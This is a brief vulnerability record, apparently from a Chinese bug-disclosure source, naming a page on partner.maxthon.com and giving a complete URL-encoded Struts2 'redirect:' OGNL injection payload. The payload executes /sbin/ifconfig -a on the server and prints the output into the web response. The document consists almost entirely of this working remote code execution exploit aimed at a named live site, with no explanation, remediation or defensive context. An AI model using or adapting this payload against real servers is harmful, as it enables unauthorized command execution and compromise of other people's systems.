# 漏洞出处
http://partner.maxthon.com/rnd.action
# 执行命令
http://partner.maxthon.com/?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'/sbin/ifconfig','-a'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}